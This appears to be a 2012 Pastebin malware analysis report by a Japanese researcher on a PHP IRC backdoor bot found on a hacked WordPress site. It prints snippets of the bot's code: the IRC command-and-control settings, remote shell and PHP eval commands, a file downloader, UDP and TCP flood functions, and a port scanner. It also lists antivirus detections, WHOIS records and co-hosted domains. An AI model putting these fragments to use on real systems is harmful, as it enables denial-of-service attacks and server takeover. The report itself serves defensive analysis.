SHARE
TWEET

#OCJP-040 New Variant PHP/IRC DoS Tools (Win32/Posix)

unixfreaxjp May 2nd, 2012 451 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ==============================
  2. Operation Cleanup Japan
  3. report: #OCJP-040
  4. Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
  5. VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
  6. ==============================
  7. This is the PHP IRC/Bot Malware found in Japan IDC Server w/vulnerable Wordpress theme plugin.
  8. Currently is under investigation under #OCJP case : OCJP-040
  9.  
  10. Below is the proof of malicious activities of the object:
  11. ==================
  12. IRC base Bot:
  13. ==================
  14.  var $config = array("server"=>"irc.s4l1ty.info",
  15. "port"=>6667,
  16. "pass"=>"zero",
  17. "prefix"=>"ZERO",
  18. "maxrand"=>8,
  19. "chan"=>"#zero",
  20. "key"=>"",
  21. "modes"=>"+iB-x",
  22. "password"=>"zero",
  23. "trigger"=>".",
  24. "hostauth"=>"*" // * for any hostname
  25.  
  26. ==================
  27. DNS Lookup
  28. ==================
  29.  config.inc.txt(15):  * .dns <IP|HOST> //dns lookup
  30. config.inc.txt(206): case "dns":
  31. config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
  32. config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));  
  33.  
  34. ==================
  35. SERVER REMOTE EXECUTION
  36. ==================
  37. Designed to execute the shell command of the unix or Windows OS if having PHP installed:
  38.  
  39. *  .sexec <cmd> // uses shell_exec() //execute a command
  40. *  .exec <cmd> // uses exec() //execute a command
  41. *  .cmd <cmd> // uses popen() //execute a command
  42. *  .php <php code> // uses eval() //execute php code
  43.  
  44. ==================
  45. DOWNLOADER
  46. ==================
  47. Download interface to the hacked system:
  48. *  .download <URL> <filename> //download a file
  49. else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
  50.  
  51.  
  52. ==================
  53. HACKER GROUP ATTACK TOOLS
  54. ==================
  55. This tools belongs to this hacker group:
  56. #crew@corp. since 2003
  57. edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
  58. Friend: LP <fuckerboy@sercret.gov>
  59.  
  60.  
  61. ==================
  62. INFECTION NOTIFICATION
  63. ==================
  64. Reporting the infection to the vulnerable machine thru IRC channel:
  65. $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
  66. $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
  67.  
  68. ==================
  69. DoS / DDoS ATTACK TOOLS
  70. ==================
  71. Three attack tools functions:
  72.  
  73. TCP FLOOD
  74. -----------
  75.  *  .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
  76. case "tcpflood":
  77. if(count($mcmd)>5)
  78. {$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
  79.  function tcpflood($host,$packets,$packetsize,$port,$delay)
  80. {$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
  81. $packet = "";
  82. for($i=0;$i<$packetsize;$i++)
  83.  
  84.  
  85. UDP FLOOD
  86. -----------
  87. *  .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
  88.   function udpflood($host,$packetsize,$time) {
  89. $this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
  90. $packet = "";
  91. for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
  92. $timei = time();$i = 0;
  93. while(time()-$timei < $time) {
  94. $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
  95. fwrite($fp,$packet);fclose($fp);$i++;
  96.  
  97. PORT SCANNING
  98. -----------
  99. *  .pscan <host> <port> //port scan
  100.  case "pscan": // .pscan  6667
  101. if(count($mcmd) > 2)
  102. { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
  103. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
  104. else
  105. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");  
  106.  
  107. ==================
  108. Portuguesel language used a lot:
  109. ==================
  110.  Impossivel mandar e-mail.");
  111. ensagem enviada para \2"
  112. Nao foi possivel fazer o download. Permissao negada.
  113.  
  114. ==================
  115. SPYWARE
  116. ==================
  117. Can send email messages to send infected system credential via IRC, can be used for spamming purpose:
  118. if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
  119. {$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
  120. else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
  121.  $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
  122.  $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
  123.  
  124. ================================
  125. MALWARE SOURCE
  126. ================================
  127.  
  128. --14:34:56--  http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
  129.            => `config.inc.txt'
  130. Resolving happymeme.com... 112.78.112.187
  131. Connecting to happymeme.com|112.78.112.187|:80... connected.
  132. HTTP request sent, awaiting response... 200 OK
  133. Length: 23,375 (23K) [text/plain]
  134. 100%[====================================>] 23,375        81.18K/s
  135. 14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]
  136.  
  137.  
  138. ================================
  139. VIRUS TOTAL
  140. ================================
  141. https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
  142. nProtect                 : Trojan.Dropper.RYF
  143. K7AntiVirus              : Backdoor
  144. VirusBuster              : PHP.Shellbot.J
  145. F-Prot                   : PHP/Pbot.B
  146. Symantec                 : PHP.Backdoor.Trojan
  147. Norman                   : PHP/Ircbot.BBPH
  148. TrendMicro-HouseCall     : BKDR_PHPBOT.SM
  149. Avast                    : PHP:IRCBot-AB [Trj]
  150. ClamAV                   : PHP.Bot
  151. Kaspersky                : Backdoor.PHP.Pbot.a
  152. BitDefender              : Trojan.Dropper.RYF
  153. Sophos                   : Troj/PHPBot-F
  154. Comodo                   : Backdoor.PHP.Pbot.A
  155. F-Secure                 : Trojan.Dropper.RYF
  156. DrWeb                    : PHP.BackDoor.14
  157. VIPRE                    : Backdoor.PHP.Pbot.b (v) (not malicious)
  158. AntiVir                  : PHP/PBot.A.6
  159. TrendMicro               : BKDR_PHPBOT.SM
  160. McAfee-GW-Edition        : Heuristic.BehavesLike.JS.Suspicious.G
  161. Emsisoft                 : Backdoor.PHP.Pbot!IK
  162. eTrust-Vet               : PHP/Pbot.D
  163. Jiangmin                 : Trojan/Script.Gen
  164. Microsoft                : Trojan:PHP/Flader.A
  165. GData                    : Trojan.Dropper.RYF
  166. Commtouch                : PHP/Pbot.B
  167. AhnLab-V3                : PHP/Pbot
  168. VBA32                    : Backdoor.PHP.Pbot.a
  169. PCTools                  : Malware.PHP-Backdoor
  170. Rising                   : Trojan.Script.HTML.Agent.ab
  171. Ikarus                   : Backdoor.PHP.Pbot
  172. Fortinet                 : PHP/Pbot.AK!tr.bdr
  173. AVG                      : PHP/BackDoor.K
  174. Panda                    : Bck/Pbot.B
  175.  
  176. ================================
  177. NETWORK SOURCE
  178. ================================
  179.  
  180. Routing (AS)
  181. -----------
  182.  
  183. IP:             112.78.112.187
  184. inetnum:        112.78.112.0 - 112.78.112.255
  185. netname:        SAKURA-NET
  186. descr:          SAKURA Internet Inc.
  187. country:        JP
  188. admin-c:        KT749JP
  189. tech-c:         KW419JP
  190. remarks:        This information has been partially mirrored by APNIC from
  191. remarks:        JPNIC. To obtain more specific information, please use the
  192. remarks:        JPNIC WHOIS Gateway at
  193. remarks:        http://www.nic.ad.jp/en/db/whois/en-gateway.html or
  194. remarks:        whois.nic.ad.jp for WHOIS client. (The WHOIS client
  195. remarks:        defaults to Japanese output, use the /e switch for English
  196. remarks:        output)
  197. changed:        apnic-ftp@nic.ad.jp 20090303
  198. changed:        apnic-ftp@nic.ad.jp 20090331
  199. source:         JPNIC
  200.  
  201.  
  202. 112.78.112.0/20
  203. SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
  204. 1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan
  205.  
  206. AS9371
  207. SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
  208. Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
  209. Chuo-ku Osaka 541-0054, Japan
  210.  
  211.  
  212. Domain
  213. -----------
  214.  
  215. Domain Name:    happymeme.com
  216. Created On:     2007-02-25 13:40:54.0
  217. Last Updated On:        2012-02-27 21:37:36.0
  218. Expiration Date:        2013-02-25 04:40:54.0
  219. Status: ACTIVE
  220. Registrant Name:        Whois Privacy Protection Service
  221. Registrant Organization:        paperboy and co.
  222. Registrant Street1:     2-7-21 Tenjin Chuo-ku
  223. Registrant Street2:     Tenjin Prime 8F
  224. Registrant City:        Fukuoka-shi
  225. Registrant State:       Fukuoka
  226. Registrant Postal Code: 8100001
  227. Registrant Country:     JP
  228. Registrant Phone:       81-927137999
  229. Registrant Fax: 81-927137944
  230. Tech Email: privacy@whoisprivacyprotection.info
  231. Name Server: ns1.dns.ne.jp
  232. Name Server: ns2.dns.ne.jp
  233.  
  234. --------------------------------------------------
  235. Host names sharing IP with A records is under the
  236. same risk w/ the current findings (112 items)
  237. --------------------------------------------------
  238. 194964s.com
  239. 2103kakaku.com
  240. aeru21.com
  241. aeruzo.com
  242. aeruzo.net
  243. aitaiyoo.com
  244. aitaizo.com
  245. aitaizo.net
  246. anzen-shisan.com
  247. anzen-toushi.com
  248. b-jays.net
  249. biyo-neosta.com
  250. boku-uma.com
  251. cafebuono.net
  252. carnavi-neosta.com
  253. chanel-neosta.com
  254. chusho-ma.biz
  255. cosmo-support.com
  256. cucina-style.com
  257. cutie-eggs.com
  258. daftbrain.com
  259. dankai-club.com
  260. daveswebworks.com
  261. draxn.net
  262. drbeverlynelson.com
  263. earthworks1.com
  264. ed3s.net
  265. enyasuita.com
  266. extank.com
  267. fukuirin.com
  268. fx-toushi.biz
  269. gaika-yokin.org
  270. gakushi110.com
  271. gan-kenko.com
  272. gooddieter.org
  273. gucci-neosta.com
  274. hajikunshop.com
  275. happyguide.biz
  276. happyguide.info
  277. happymailz.com
  278. happymailz.net
  279. happymeme.com
  280. hlj93.com
  281. hpmls.net
  282. ichikawayuu.com
  283. iheya-genkimura.org
  284. iirufa.com
  285. japangoodsplaza.com
  286. jewelry-neosta.com
  287. ji-joutatsu.com
  288. kanakana-piano.com
  289. kineyakatsuroku.com
  290. koi-iro.com
  291. kojimatsubasa.com
  292. koshunyujob.com
  293. kotaninene.com
  294. kounojimusyo.com
  295. loaddarthtrader.com
  296. lumiere4.com
  297. luxy-party.com
  298. m2051.com
  299. macj-log.com
  300. mail.nagasaka-web.net
  301. mail.s-smile.net
  302. marujyohome.com
  303. mild7-1.net
  304. morigen.info
  305. morita29.com
  306. nagasaka-web.net
  307. newsharaku.com
  308. nibo6.com
  309. nitoroy.com
  310. npo-bsk.com
  311. npo-hima.net
  312. okamotoann.com
  313. onyanco.com
  314. oonoyohei.com
  315. oota-amaharashi.jp
  316. ozakikana.com
  317. penki-nurikae.com
  318. potyari.biz
  319. recorder-neosta.com
  320. redrox.net
  321. reiki-a.com
  322. reiki-dream.net
  323. rightsangyou.com
  324. ryuzo-nakata.com
  325. s-smile.net
  326. sakaidaiki.com
  327. sankei-inc.com
  328. sekengaku.org
  329. sekiaya.com
  330. sheadream.com
  331. shibataindustries.com
  332. shimadadaiki.com
  333. shisan-unyou.info
  334. smileagefan.com
  335. t-zei.jp
  336. ton-kichi.net
  337. toushi-fx.net
  338. uchiyamahinata.com
  339. www.h-sketch.com
  340. www.oota-amaharashi.jp
  341. www.penki-nurikae.com
  342. www.t-zei.jp
  343. xn--torr3dy20axh7a.com (.com)
  344. yamacho-club.com
  345. yen-energy.com
  346. yoke-kichijoji.com
  347. yokohamahikari.com
  348. yosapark-saribaba.com
  349. yurai-seitai.net
  350. ------
  351. ZeroDay Japan http://0day.jp
  352. OPERATION CLEANUP JAPAN | #OCJP
  353. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
  354. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top